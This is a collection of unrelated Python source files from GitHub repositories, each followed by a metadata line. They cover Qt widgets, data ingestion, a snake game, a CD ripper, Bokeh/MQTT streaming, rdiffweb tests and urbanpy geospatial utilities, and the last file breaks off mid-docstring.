# 最早日期 2019-06-03
rel = RelationPipeline()
if len(sys.argv) > 1:
rel.process(sys.argv[1])
else:
rel.process("yesterday")
| RogerJTX/KbpPipeline_ExpertSystem | patent/patent_relation.py | patent_relation.py | py | 10,621 | python | en | code | 3 | github-code | 36 |
26072099672 | from PySide2 import QtWidgets
from PySide2.QtCore import Signal
# widget to get input for vector 3 types
class Vector3Widget(QtWidgets.QWidget):
# Signals
on_value_changed = Signal(tuple)
_main_layout = None
def __init__(self, value=(0, 0, 0)):
QtWidgets.QWidget.__init__(self)
self._value = value
# main layout
self._main_layout = QtWidgets.QGridLayout()
self._main_layout.setSpacing(0)
self.setLayout(self._main_layout)
# input fields
self._unit_1_field = None
self._unit_2_field = None
self._unit_3_field = None
self._create_ui()
def _create_ui(self):
# field for value x
self._unit_1_field = QtWidgets.QSpinBox()
self._unit_1_field.setValue(self._value[0])
self._unit_1_field.editingFinished.connect(self._on_field_value_changed)
# field for value y
self._unit_2_field = QtWidgets.QSpinBox()
self._unit_2_field.setValue(self._value[1])
self._unit_2_field.editingFinished.connect(self._on_field_value_changed)
# field for value z
self._unit_3_field = QtWidgets.QSpinBox()
self._unit_3_field.setValue(self._value[2])
self._unit_3_field.editingFinished.connect(self._on_field_value_changed)
# add to layout
self._main_layout.addWidget(self._unit_1_field, 1, 2)
self._main_layout.addWidget(self._unit_2_field, 1, 3)
self._main_layout.addWidget(self._unit_3_field, 1, 4)
def _on_field_value_changed(self, value=0):
self.on_value_changed.emit(self.get_value())
def get_value(self):
return (self._unit_1_field.value(), self._unit_2_field.value(), self._unit_3_field.value()) | JonathanVeit/building_generator | scripts/gui/Vector3Widget.py | Vector3Widget.py | py | 1,746 | python | en | code | 0 | github-code | 36 |
13758234528 |
def sliding_window(img, size, step):
xall = np.expand_dims(img, axis=0)
for y in range(0, 280, step):
for x in range(0, 280, step):
x1n = np.copy(img)
x1n = np.expand_dims(x1n, axis=0)
x1n[:,y:y + size, x:x + size]=0
xall= np.concatenate((xall, x1n), axis=0)
return xall[1:len(xall)]
pic1_window = sliding_window(pic1, 60, 10)
pic1_pred = np.round(model.predict(pic1_window))
pic1_re = np.reshape(pic1_pred, (28,28))
pic1_re_flip = np.fliplr(pic1_re)
pic2_window = sliding_window(pic2, 60, 10)
pic2_pred = np.round(model.predict(pic2_window))
pic2_re = np.reshape(pic2_pred, (28,28))
pic2_re_flip = np.fliplr(pic2_re)
fig, ax = plt.subplots()
cax = ax.imshow(pic3_re, clim=(4.0, 7), cmap='hot')
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
ticks=[7,6,5,4,3]
cbar = fig.colorbar(cax, ticks=ticks, boundaries=[4,5,6,7,8])
loc = [7.5, 6.5, 5.5, 4.5]
cbar.set_ticks(loc)
cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3'])
plt.show()
# fig, ax = plt.subplots()
# cax = ax.imshow(pic1_re, clim=(11.0, 17), cmap='hot')
# ax.axes.get_xaxis().set_ticks([])
# ax.axes.get_yaxis().set_ticks([])
# ticks=[18,17,16,15,14,13,12]
# cbar = fig.colorbar(cax, ticks=ticks, boundaries=[11,12,13,14,15,16,17,18])
# loc = [17.5, 16.5, 15.5 , 14.5, 13.5, 12.5, 11.5]
# cbar.set_ticks(loc)
# cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3','-4','-5','-6'])
# plt.show()
fig, ax = plt.subplots()
cax = ax.imshow(pic2_re_flip, clim=(8.0, 12), cmap='hot')
ax.axes.get_xaxis().set_ticks([])
ax.axes.get_yaxis().set_ticks([])
ticks=[13,12,11,10,9,8]
cbar = fig.colorbar(cax, ticks=ticks, boundaries=[8,9,10,11,12,13])
loc = [12.5, 11.5, 10.5, 9.5, 8.5]
cbar.set_ticks(loc)
cbar.ax.set_yticklabels(['GT', '-1', '-2', '-3','-4','-5'])
plt.show()
| andobrescu/Leaf-Counting | Learning_box _vis.py | Learning_box _vis.py | py | 1,801 | python | en | code | 4 | github-code | 36 |
36683998868 | import os
import json
from typing import List
from datetime import datetime
import pandas as pd
#############Load config.json and get input and output paths
with open('config.json','r') as f:
config = json.load(f)
input_folder_path = config['input_folder_path']
output_folder_path = config['output_folder_path']
ingestion_record_file_name = config['ingestion_record_file_name']
ingestion_file_name = config['ingestion_file_name']
#############Function for data ingestion
def read_tabular_file(dir_name: str, file_name: str):
return pd.read_csv(os.path.join(dir_name, file_name), sep=',', encoding='utf-8')
def clean_dataframe(df: pd.DataFrame):
# filter out duplicates
df = df.drop_duplicates()
return df
def save_dataframe(df, output_dir_name: str, file_name: str):
df.to_csv(os.path.join(output_dir_name, file_name), sep=',', encoding='utf-8', index=False)
def write_ingested_file_record(file_name: str, file_dir: str, ingested_file_loc: str, ingested_file_name: str, ingested_file_length: int):
with open(os.path.join(file_dir, file_name), 'a') as f:
f.write("{datetime}\t{location}\t{filename}\t{length}\n".format(
datetime=datetime.now(),
location=ingested_file_loc,
filename=ingested_file_name,
length=ingested_file_length
))
def merge_multiple_dataframe(input_folder_dir: str,
output_folder_dir: str,
output_file_name: str,
record_file_name: str,
data_cols: List[str] = ["corporation", "lastmonth_activity", "lastyear_activity", "number_of_employees", "exited"]):
# check for datasets, compile them together, and write to an output file
file_name_ls = os.listdir(input_folder_dir)
df_list = pd.DataFrame(columns=data_cols)
for file_name in file_name_ls:
df = read_tabular_file(input_folder_dir, file_name)
df_list = df_list.append(df)
write_ingested_file_record(record_file_name, output_folder_dir,
input_folder_dir, file_name, len(df))
df_list = clean_dataframe(df_list)
save_dataframe(df_list, output_folder_path, output_file_name)
if __name__ == '__main__':
merge_multiple_dataframe(input_folder_path, output_folder_path, ingestion_file_name, ingestion_record_file_name)
| wonyoungseo/ex-risk-assessment-ml-model-deployment-monitoring-system | ingestion.py | ingestion.py | py | 2,461 | python | en | code | 0 | github-code | 36 |
23228731915 | import sys
import time
import random
import pygame
from event_listener import event_listener
from functions import render_all, one_dimensional_list, update_frames
sys.path.insert(1, 'player')
from yoshi import Yoshi
from movement import move_all, set_direction, move
sys.path.insert(1, 'eggs')
from egg import Egg
sys.path.insert(1, 'end_game')
from end_game import end_game
from death_collided import collided_walls
pygame.init()
# Setting app name.
pygame.display.set_caption("Yoshi Snake Game.")
# It should be 17x15.
SCREEN_WIDTH = 680
SCREEN_HEIGHT = 600
GREEN = (31, 134, 31)
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
yoshis = []
eggs = []
objects = []
objects.append(yoshis)
objects.append(eggs)
# Creating player character.
player = Yoshi()
yoshis.append(player)
# Testing egg.
eggy = Egg("green")
eggs.append(eggy)
# Allows player to choose first direction.
direction = ""
score = 1
frame = 0
while True:
# Rendering frame
# Reseting screen for every frame.
screen.fill(GREEN)
# Rendering all objects
render_all( one_dimensional_list(objects), screen )
# Flip the display
pygame.display.flip()
# Verifying if player lost:
if collided_walls(player, SCREEN_WIDTH, SCREEN_HEIGHT):
end_game(screen)
time.sleep(0.5)
# Taking input.
last_relevant_event = event_listener()
# Closing game if clicked to quit:
if last_relevant_event == "quit":
sys.exit(0)
# Preparing for the next rendering:
move_all(yoshis)
direction = set_direction(direction, last_relevant_event)
move(player, direction, 40, 40)
# Checking egg collision.
if eggy.check_collision(player):
new_yoshi = Yoshi(x = player.x, y = player.y, current_frame = frame)
yoshis.append(new_yoshi)
# Changing egg location.
eggy.x = random.randint(0, 16) * 40
eggy.y = random.randint(0, 14) * 40
score += 1
pygame.display.set_caption("Yoshi's Snake Game." + " " * 3 + "Score: " + str(score))
# Updating gif frames.
update_frames(one_dimensional_list(objects))
frame += 1
| mignoe/Games | yoshi-snake-game/game.py | game.py | py | 2,214 | python | en | code | 3 | github-code | 36 |
11303986062 | from enum import Enum
import logging
from pathlib import Path
from transitions import Machine
from ..config import ALBUM_FOLDER_NAME_TEMPLATE
from ..config import MUSIC_PATH_NAME
from ..config import TRACK_FILE_NAME_TEMPLATE
from ..config import VA_ALBUM_FOLDER_NAME_TEMPLATE
logger = logging.getLogger(__name__)
class States(Enum):
NO_DISC = 1
KNOWN_DISC = 2
RIPPING = 3
DONE = 4
class Triggers(object):
START = 'start'
KNOWN_DISC = 'known_disc'
RIP_TRACK = 'rip_track'
FINISH = 'finish'
EJECT = 'eject'
class Ripper(object):
def __init__(
self,
grab_and_convert_track_func,
create_folder_func,
write_meta_func,
move_track_func,
write_disc_id_func,
after_state_change_callback
):
self.grab_and_convert_track_func = grab_and_convert_track_func
self.create_folder_func = create_folder_func
self.write_meta_func = write_meta_func
self.move_track_func = move_track_func
self.write_disc_id_func = write_disc_id_func
self.after_state_change_callback = after_state_change_callback
self._clear_internal_state()
def _clear_internal_state(self):
self.disc_meta = None
self.track_list = None
self.current_track = None
self.folder_path = None
def set_disc_meta(self, disc_meta):
self.disc_meta = disc_meta
self.track_list = []
self.current_track = 0
def create_folder(self, disc_meta):
self.folder_path = self._get_folder_path(disc_meta)
self.create_folder_func(self.folder_path)
def _get_folder_path(self, disc_meta):
album_path = Path(MUSIC_PATH_NAME)
if 'artist' in disc_meta:
album_path = album_path.joinpath(
self._remove_unsafe_chars(
ALBUM_FOLDER_NAME_TEMPLATE.format(
artist=disc_meta['artist'],
title=disc_meta['title']
)
)
)
else:
album_path = album_path.joinpath(
self._remove_unsafe_chars(
VA_ALBUM_FOLDER_NAME_TEMPLATE.format(title=disc_meta['title'])
)
)
if disc_meta['total_cds'] > 1:
album_path = album_path.joinpath('CD%s' % disc_meta['cd'])
return album_path
def _remove_unsafe_chars(self, path_name):
return path_name.replace('\\', ' ')\
.replace('/', ' ')\
.replace(':', ' ')
def has_next_track(self):
return self.current_track < len(self.disc_meta['tracks'])
def rip_next_track(self):
track_number = self.current_track + 1
logger.info('Ripping track %s', track_number)
tmp_file_path = Path(self.grab_and_convert_track_func(track_number))
self.tag_track(track_number, str(tmp_file_path))
target_path = self.folder_path.joinpath(
self._get_track_filename(track_number)
)
self.move_track_func(tmp_file_path, target_path)
self.track_list.append(str(target_path))
self.current_track = track_number
self.after_state_change_callback()
def tag_track(self, track_number, track_filename):
track_meta = self.disc_meta['tracks'][track_number - 1]
self.write_meta_func(
track_filename,
track_meta['artist'],
track_meta['title'],
self.disc_meta['title'],
track_number,
len(self.disc_meta['tracks'])
)
def _get_track_filename(self, track_number):
track_meta = self.disc_meta['tracks'][track_number - 1]
track_filename = TRACK_FILE_NAME_TEMPLATE.format(
track_number="{:02d}".format(track_number),
artist=track_meta['artist'],
title=track_meta['title']
)
return self._remove_unsafe_chars(track_filename)
def store_disc_id(self):
disc_id = self.disc_meta['disc_id']
path = self.folder_path.joinpath('.disc_id')
self.write_disc_id_func(path, disc_id)
def get_full_state(self):
return {
'state': self.state.value,
'track_list': self.track_list,
'disc_meta': self.disc_meta,
'current_track': self.current_track,
'folder_path': str(self.folder_path)
}
def on_state_change(self, *args, **kwargs):
self.after_state_change_callback()
def create_ripper(
grab_and_convert_track_func,
create_folder_func,
write_meta_func,
move_track_func,
write_disc_id_func,
after_state_change_callback
):
ripper = Ripper(
grab_and_convert_track_func,
create_folder_func,
write_meta_func,
move_track_func,
write_disc_id_func,
after_state_change_callback
)
machine = Machine(ripper, states=States, initial=States.NO_DISC, after_state_change='on_state_change')
# terminal state: disc already ripped
machine.add_transition(Triggers.KNOWN_DISC, States.NO_DISC, States.KNOWN_DISC)
machine.add_transition(
Triggers.START,
States.NO_DISC,
States.RIPPING,
before=['set_disc_meta', 'create_folder']
)
machine.add_transition(
Triggers.RIP_TRACK,
States.RIPPING,
States.RIPPING,
conditions='has_next_track',
before='rip_next_track'
)
# terminal state: disc ripped successfully
machine.add_transition(
Triggers.FINISH,
States.RIPPING,
States.DONE,
unless='has_next_track',
before='store_disc_id'
)
machine.add_transition(Triggers.EJECT, '*', States.NO_DISC, before='_clear_internal_state')
return ripper
| pisarenko-net/cdp-sa | hifi_appliance/state/ripper.py | ripper.py | py | 5,818 | python | en | code | 0 | github-code | 36 |
74226159463 | import argparse
import utils
parser = argparse.ArgumentParser(description="User need to submit job informations")
parser.add_argument('--min', type=int, required=True, help='min num of nodes')
parser.add_argument('--max', type=int, required=True, help="max num of nodes")
parser.add_argument('--N', type=int, required=True, nargs='+', help='num of nodes for scaling')
parser.add_argument('--O', type=float, required=True, nargs='+', help='objective ratio rate')
parser.add_argument('--res_up', type=int, required=True, help="scale up overhead")
parser.add_argument('--res_dw', type=int, required=True, help="scale down overhead")
parser.add_argument('--path', required=True, help="execute script path")
args = parser.parse_args()
def main():
id = utils.submit_job(min=args.min, max=args.max, N=args.N,
O=args.O, res_up=args.res_up, res_dw=args.res_dw, path=args.path)
print("Job submitted! GUID:", str(id))
'''
# previous job submit
id = m.submit_job(min=1, max=5, Ns=[1, 2, 3, 4, 5],
Os=[1, 1.8, 2.6, 3.4, 4.2], res_up=3, res_dw=1, path="train.py")
'''
if __name__ == "__main__":
main()
| BFTrainer/BFTrainer | BFSub.py | BFSub.py | py | 1,166 | python | en | code | 3 | github-code | 36 |
6939797470 | from threading import Thread
from flask import Flask, render_template
from tornado.ioloop import IOLoop
from bokeh.embed import server_document
from bokeh.layouts import column
from bokeh.plotting import figure
from bokeh.server.server import Server
from bokeh.themes import Theme
import numpy as np
from bokeh.models import ColumnDataSource
import paho.mqtt.client as mqtt
app = Flask(__name__)
def bkapp(doc):
pwr_queue = []
ts_queue = []
def on_message(client, userdata, message):
ts, pwr = map(float, message.payload.split(b','))
ts_queue.append(ts)
pwr_queue.append(pwr)
cds = ColumnDataSource(data={'x': [], 'y': []})
def callback():
nonlocal ts_queue, pwr_queue
# append any new data to the graph
cds.stream({'x': ts_queue, 'y': pwr_queue})
# then clear the queues
pwr_queue.clear()
ts_queue.clear()
p = figure(sizing_mode='stretch_width', title='MQTT streaming example')
random255 = lambda: np.random.randint(255)
color = tuple(random255() for _ in range(3))
p.line('x', 'y', source=cds, color=color)
doc.add_root(column(p))
# init client
client = mqtt.Client("stream")
client.connect("localhost")
client.subscribe("plug/0")
client.on_message=on_message
# loop
client.loop_start() # Runs a loop in a background thread
doc.add_periodic_callback(callback, 100)
@app.route('/', methods=['GET'])
def bkapp_page():
script = server_document('http://127.0.0.1:5006/bkapp')
return render_template("mqtt.html", script=script, template="Flask")
def bk_worker():
# Can't pass num_procs > 1 in this configuration.
server = Server({'/bkapp': bkapp},
io_loop=IOLoop(),
allow_websocket_origin=["127.0.0.1:8000"])
server.start()
server.io_loop.start()
Thread(target=bk_worker).start()
if __name__ == '__main__':
app.run(port=8000)
| marnatgon/Senior-Design | software/example/flask/mqtt.py | mqtt.py | py | 1,891 | python | en | code | 0 | github-code | 36 |
22985216912 | from collections import deque
from threading import Thread
class Sequencer:
def __init__(self, name):
self.name = name
self.file = open(name, "wb")
self.queue = deque()
self.running = False
self.byte_sequence = []
self.thread = Thread(target=self._writer_thread)
def add(self, byte):
index = byte['index']
self.queue.append(byte)
# self.byte_sequence.append(byte)
# self.arrange()
pass
def close(self):
"""
Wait for the writer thread to finish and close the open file.
"""
self.running = False
self.thread.join()
self.file.close()
def _writer_thread(self):
"""
Runs until a stop is requested and the queue is exhausted.
"""
self.running = True
while self.running or len(self.queue):
if len(self.queue):
byte = self.queue.popleft()
chunk = byte['index']
data = byte['data']
chunk_size = len(data)
self.file.seek(chunk*chunk_size)
self.file.write(data)
def arrange(self):
self.byte_sequence.sort(key=lambda x: x['index'])
i = 0
while i != len(self.byte_sequence):
current = self.byte_sequence[i]
previous = self.byte_sequence[i - 1]
current_sequence = current.get('index')
previous_sequence = previous.get('last', previous.get('index'))
if (current_sequence - 1) == previous_sequence and (current_sequence - 1) > -1:
current = self.byte_sequence.pop(i)
previous['data'] = previous['data'] + current.get('data', b'')
last_sequence = current.get('last', current.get('index'))
previous['last'] = last_sequence
continue
i += 1
print(self.byte_sequence)
if __name__ == '__main__':
obj = Sequencer('test')
obj.add({'index': 0, 'data': b'0'})
obj.add({'index': 1, 'data': b'1'})
obj.add({'index': 2, 'data': b'2'})
obj.add({'index': 3, 'data': b'3'})
obj.add({'index': 4, 'data': b'4'})
obj.add({'index': 5, 'data': b'5'})
obj.add({'index': 6, 'data': b'6'})
obj.add({'index': 7, 'data': b'7'})
obj.add({'index': 8, 'data': b'8'})
obj.add({'index': 9, 'data': b'9'})
obj.add({'index': 10, 'data': b'10'})
obj.add({'index': 11, 'data': b'11'})
| muthuprabhu-kp/FTOU | Server/ByteSequencer.py | ByteSequencer.py | py | 2,482 | python | en | code | 0 | github-code | 36 |
27551532420 | import rdiffweb.test
from rdiffweb.core.model import RepoObject, UserObject
class SettingsTest(rdiffweb.test.WebCase):
login = True
def test_page(self):
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
self.assertInBody("General Settings")
self.assertStatus(200)
def test_page_encoding_none(self):
# Given a repo where encoding is not defined.
RepoObject.query.update({RepoObject.encoding: None})
repo = RepoObject.query.first()
repo.commit()
# When browsing settings pages
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
# Then not error is report.
self.assertStatus(200)
def test_as_another_user(self):
# Create a nother user with admin right
user_obj = UserObject.add_user('anotheruser', 'password')
user_obj.user_root = self.testcases
user_obj.refresh_repos()
user_obj.commit()
self.getPage("/settings/anotheruser/testcases")
self.assertInBody("General Settings")
self.assertStatus('200 OK')
# Remove admin right
admin = UserObject.get_user('admin')
admin.role = UserObject.USER_ROLE
admin.commit()
# Browse admin's repos
self.getPage("/settings/anotheruser/testcases")
self.assertStatus('403 Forbidden')
def test_set_maxage(self):
# When updating maxage
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/", method="POST", body={'maxage': '4'})
self.assertStatus(303)
# Then a succes message is displayed to user
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/")
self.assertStatus(200)
self.assertInBody("Settings modified successfully.")
# Then repo get updated
repo_obj = RepoObject.query.filter(RepoObject.repopath == self.REPO).first()
self.assertEqual(4, repo_obj.maxage)
def test_set_maxage_method_get(self):
# When trying to update maxage with GET method
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO + "/?maxage=4")
# Then page return without error
self.assertStatus(200)
# Then database is not updated
repo_obj = RepoObject.query.filter(RepoObject.repopath == self.REPO).first()
self.assertEqual(0, repo_obj.maxage)
def test_does_not_exists(self):
# Given an invalid repo
repo = 'invalid'
# When trying to get settings from it
self.getPage("/settings/" + self.USERNAME + "/" + repo)
# Then a 404 error is return
self.assertStatus(404)
def test_browser_with_failed_repo(self):
# Given a failed repo
admin = UserObject.get_user('admin')
admin.user_root = '/invalid/'
admin.commit()
# When querying the logs
self.getPage("/settings/" + self.USERNAME + "/" + self.REPO)
# Then the page is return with an error message
self.assertStatus(200)
self.assertInBody('The repository cannot be found or is badly damaged.')
| ikus060/rdiffweb | rdiffweb/controller/tests/test_page_settings.py | test_page_settings.py | py | 3,100 | python | en | code | 114 | github-code | 36 |
28786462902 | import pandas as pd
import geopandas as gpd
import osmnx as ox
from h3 import h3
from rich.progress import track
from urbanpy.utils import geo_boundary_to_polygon
from typing import Sequence, Union
__all__ = [
"merge_geom_downloads",
"filter_population",
"remove_features",
"gen_hexagons",
"merge_shape_hex",
"overlay_polygons_hexs",
"resolution_downsampling",
"osmnx_coefficient_computation",
]
def merge_geom_downloads(
gdfs: Sequence[gpd.GeoDataFrame], crs: str = "EPSG:4326"
) -> gpd.GeoDataFrame:
"""
Merge several GeoDataFrames from OSM download_osm
Parameters
----------
dfs: array_like
Array of GeoDataFrames to merge. Assumes equal CRS.
crs: str
Valid string to pass to crs param of the geopandas.GeoDataFrame constructor function.
Returns
-------
concat: GeoDataFrame
Output from concatenation and unary union of geometries, providing a single geometry database for the city
Examples
--------
>>> lima = urbanpy.download.nominatim_osm("Lima, Peru", 2)
>>> callao = urbanpy.download.nominatim_osm("Callao, Peru", 1)
>>> lima = urbanpy.geom.merge_geom_downloads([lima, callao])
>>> lima.head()
geometry
MULTIPOLYGON (((-76.80277 -12.47562, -76.80261...)))
"""
concat = gpd.GeoDataFrame(geometry=[pd.concat(gdfs).unary_union], crs=crs)
return concat
def filter_population(
pop_df: pd.DataFrame, polygon_gdf: gpd.GeoDataFrame
) -> gpd.GeoDataFrame:
"""
Filter an HDX database download to the polygon bounds
Parameters
----------
pop_df: DataFrame
Result from download_hdx
polygon_gdf: GeoDataFrame
Result from download_osm or merge_geom_downloads
Returns
-------
filtered_points_gdf: GeoDataFrame
Population DataFrame filtered to polygon bounds
Examples
--------
>>> lima = urbanpy.download.nominatim_osm("Lima, Peru", 2)
>>> callao = urbanpy.download.nominatim_osm("Callao, Peru", 1)
>>> lima = urbanpy.geom.merge_geom_downloads([lima, callao])
>>> pop = urbanpy.download.hdx_fb_population('peru', 'full')
>>> urbanpy.geom.filter_population(pop, lima)
latitude | longitude | population_2015 | population_2020 | geometry
-12.519861 | -76.774583 | 2.633668 | 2.644757 | POINT (-76.77458 -12.51986)
-12.519861 | -76.745972 | 2.633668 | 2.644757 | POINT (-76.74597 -12.51986)
-12.519861 | -76.745694 | 2.633668 | 2.644757 | POINT (-76.74569 -12.51986)
-12.519861 | -76.742639 | 2.633668 | 2.644757 | POINT (-76.74264 -12.51986)
-12.519861 | -76.741250 | 2.633668 | 2.644757 | POINT (-76.74125 -12.51986)
"""
minx, miny, maxx, maxy = polygon_gdf.geometry.total_bounds
limits_filter = pop_df["longitude"].between(minx, maxx) & pop_df[
"latitude"
].between(miny, maxy)
filtered_points = pop_df[limits_filter]
geometry_ = gpd.points_from_xy(
filtered_points["longitude"], filtered_points["latitude"]
)
filtered_points_gdf = gpd.GeoDataFrame(
filtered_points, geometry=geometry_, crs="EPSG:4326"
)
return filtered_points_gdf
def remove_features(gdf: gpd.GeoDataFrame, bounds: Sequence[float]) -> gpd.GeoDataFrame:
"""
Remove a set of features based on bounds
Parameters
----------
gdf: GeoDataFrame
Input GeoDataFrame containing the point features filtered with filter_population
bounds: array_like
Array input following [minx, miny, maxx, maxy] for filtering (GeoPandas total_bounds method output)
Returns
-------
gdf: GeoDataFrame
Input DataFrame but without the desired features
Examples
--------
>>> lima = urbanpy.geom.filter_population(pop_lima, poly_lima)
>>> removed = urbanpy.geom.remove_features(lima, [-12.2,-12, -77.2,-77.17]) #Remove San Lorenzo Island
>>> print(lima.shape, removed.shape)
(348434, 4) (348427, 4)
"""
minx, miny, maxx, maxy = bounds
drop_ix = gdf.cx[minx:maxx, miny:maxy].index
return gdf.drop(drop_ix)
def gen_hexagons(resolution: int, city: gpd.GeoDataFrame) -> gpd.GeoDataFrame:
"""
Converts an input multipolygon layer to H3 hexagons given a resolution.
Parameters
----------
resolution: int, 0:15
Hexagon resolution, higher values create smaller hexagons.
city: GeoDataFrame
Input city polygons to transform into hexagons.
Returns
-------
city_hexagons: GeoDataFrame
Hexagon geometry GeoDataFrame (hex_id, geom).
Examples
--------
>>> lima = urbanpy.geom.filter_population(pop_lima, poly_lima)
>>> lima_hex = urbanpy.geom.gen_hexagons(8, lima)
hex | geometry
888e620e41fffff | POLYGON ((-76.80007 -12.46917, -76.80439 -12.4...))
888e62c809fffff | POLYGON ((-77.22539 -12.08663, -77.22971 -12.0...))
888e62c851fffff | POLYGON ((-77.20708 -12.08484, -77.21140 -12.0...))
888e62c841fffff | POLYGON ((-77.22689 -12.07104, -77.23122 -12.0...))
888e62c847fffff | POLYGON ((-77.23072 -12.07929, -77.23504 -12.0...))
"""
# Polyfill the city boundaries
h3_polygons = list()
h3_indexes = list()
# Get every polygon in Multipolygon shape
city_poly = city.explode(index_parts=True).reset_index(drop=True)
for _, geo in city_poly.iterrows():
hexagons = h3.polyfill(
geo["geometry"].__geo_interface__, res=resolution, geo_json_conformant=True
)
for hexagon in hexagons:
h3_polygons.append(geo_boundary_to_polygon(hexagon))
h3_indexes.append(hexagon)
# Create hexagon dataframe
city_hexagons = gpd.GeoDataFrame(h3_indexes, geometry=h3_polygons).drop_duplicates()
city_hexagons.crs = "EPSG:4326"
city_hexagons = city_hexagons.rename(
columns={0: "hex"}
) # Format column name for readability
return city_hexagons
def merge_shape_hex(
hexs: gpd.GeoDataFrame,
shape: gpd.GeoDataFrame,
agg: dict,
how="inner",
predicate="intersects",
) -> gpd.GeoDataFrame:
"""
Merges a H3 hexagon GeoDataFrame with a Point GeoDataFrame and aggregates the
point gdf data.
Parameters
----------
hexs: GeoDataFrame
Input GeoDataFrame containing hexagon geometries
shape: GeoDataFrame
Input GeoDataFrame containing points and features to be aggregated
agg: dict
A dictionary with column names as keys and values as aggregation
operations. The aggregation must be one of {'sum', 'min', 'max'}.
how: str. One of {'inner', 'left', 'right'}. Default 'inner'.
Determines how to merge data:
'left' uses keys from left and only retains geometry from left
'right' uses keys from right and only retains geometry from right
'inner': use intersection of keys from both dfs; retain only left geometry column
op: str. One of {'intersects', 'contains', 'within'}. Default 'intersects'
Determines how geometries are queried for merging.
Returns
-------
hexs: GeoDataFrame
Result of a spatial join within hex and points. All features are aggregated
based on the input parameters
Examples
--------
>>> lima = urbanpy.download.nominatim_osm('Lima, Peru', 2)
>>> pop_lima = urbanpy.download.hdx_fb_population('peru', 'full')
>>> pop_df = urbanpy.filter_population(pop_lima, lima)
>>> hexs = urbanpy.geom.gen_hexagons(8, lima)
>>> urbanpy.geom.merge_point_hex(hexs, pop_df, 'inner', 'within', {'population_2020':'sum'})
0 | geometry | population_2020
888e628d8bfffff | POLYGON ((-76.66002 -12.20371, -76.66433 -12.2... | NaN
888e62c5ddfffff | POLYGON ((-76.94564 -12.16138, -76.94996 -12.1... | 14528.039097
888e62132bfffff | POLYGON ((-76.84736 -12.17523, -76.85167 -12.1... | 608.312696
888e628debfffff | POLYGON ((-76.67982 -12.18998, -76.68413 -12.1... | NaN
888e6299b3fffff | POLYGON ((-76.78876 -11.97286, -76.79307 -11.9... | 3225.658803
"""
joined = gpd.sjoin(shape, hexs, how=how, predicate=predicate)
# Uses index right based on the order of points and hex. Right takes hex index
hex_merge = joined.groupby("index_right").agg(agg)
# Avoid SpecificationError by copying the DataFrame
ret_hex = hexs.copy()
for key in agg:
ret_hex.loc[hex_merge.index, key] = hex_merge[key].values
return ret_hex
def overlay_polygons_hexs(
polygons: gpd.GeoDataFrame,
hexs: gpd.GeoDataFrame,
hex_col: str,
columns: Sequence[str],
) -> gpd.GeoDataFrame:
"""
Overlays a Polygon GeoDataFrame with a H3 hexagon GeoDataFrame and divide the 'columns' the values proportionally to the overlayed area.
Parameters
----------
polygons: GeoDataFrame
Input GeoDataFrame containing polygons and columns to be processed
hexs: GeoDataFrame
Input GeoDataFrame containing desired output hexagon resolution geometries
hex_col: str
Determines the column with the hex id.
columns: list
A list with column names of the columns that are going to be proportionally adjusted
Returns
-------
hexs: GeoDataFrame
Result of a spatial join within hex and points. All columns are adjusted
based on the overlayed area.
Examples
--------
>>> urbanpy.geom.overlay_polygons_hexs(zonas_pob, hex_lima, 'hex', pob_vulnerable)
hex | POB_TOTAL | geometry
898e6200493ffff | 193.705376 | POLYGON ((-76.80695 -12.35199, -76.80812 -12.3...
898e6200497ffff | 175.749780 | POLYGON ((-76.80412 -12.35395, -76.80528 -12.3...
898e620049bffff | 32.231078 | POLYGON ((-76.81011 -12.35342, -76.81127 -12.3...
898e62004a7ffff | 74.154973 | POLYGON ((-76.79911 -12.36468, -76.80027 -12.3...
898e62004b7ffff | 46.989828 | POLYGON ((-76.79879 -12.36128, -76.79995 -12.3...
"""
polygons_ = polygons.copy() # Preserve data state
polygons_["poly_area"] = polygons_.geometry.area # Calc polygon area
# Overlay intersection
overlayed = gpd.overlay(polygons_, hexs, how="intersection")
# Downsample indicators using proporional overlayed area w.r.t polygon area
area_prop = overlayed.geometry.area / overlayed["poly_area"]
overlayed[columns] = overlayed[columns].apply(lambda col: col * area_prop)
# Aggregate over Hex ID
per_hexagon_data = overlayed.groupby(hex_col)[columns].sum()
# Preserve data as GeoDataFrame
hex_df = pd.merge(
left=per_hexagon_data, right=hexs[[hex_col, "geometry"]], on=hex_col
)
hex_gdf = gpd.GeoDataFrame(
hex_df[[hex_col] + columns], geometry=hex_df["geometry"], crs=hexs.crs
)
return hex_gdf
def resolution_downsampling(
gdf: gpd.GeoDataFrame, hex_col: str, coarse_resolution: int, agg: dict
) -> gpd.GeoDataFrame:
"""
Downsample hexagon resolution aggregating indicated metrics (e.g. Transform hexagon resolution from 9 to 6).
Parameters
----------
gdf: GeoDataFrame
GeoDataFrame with hexagon geometries (output from gen_hexagons).
hex_col: str
Determines the column with the hex id.
coarse_resolution: int, 0:15
Hexagon resolution lower than gdf actual resolution (higher values create smaller hexagons).
Returns
-------
gdfc: GeoDataFrame
GeoDataFrame with lower resolution hexagons geometry and metrics aggregated as indicated.
"""
gdf_coarse = gdf.copy()
coarse_hex_col = "hex_{}".format(coarse_resolution)
gdf_coarse[coarse_hex_col] = gdf_coarse[hex_col].apply(
lambda x: h3.h3_to_parent(x, coarse_resolution)
)
dfc = gdf_coarse.groupby([coarse_hex_col]).agg(agg).reset_index()
gdfc_geometry = dfc[coarse_hex_col].apply(geo_boundary_to_polygon)
return gpd.GeoDataFrame(dfc, geometry=gdfc_geometry, crs=gdf.crs)
def osmnx_coefficient_computation(
gdf,
net_type,
basic_stats,
extended_stats,
connectivity=False,
anc=False,
ecc=False,
bc=False,
cc=False,
):
"""
Apply osmnx's graph from polygon to query a city's street network within a geometry.
This may be a long procedure given the hexagon layer resolution.
Parameters
----------
gdf: GeoDataFrame
GeoDataFrame with geometries to download graphs contained within them.
net_type: str
Network type to download. One of {'drive', 'drive_service', 'walk', 'bike', 'all', 'all_private'}
basic_stats: list
List of basic stats to compute from downloaded graph
extended_stats: list
List of extended stats to compute from graph
connectivity: bool. Default False.
Compute node and edge connectivity
anc: bool. Default False.
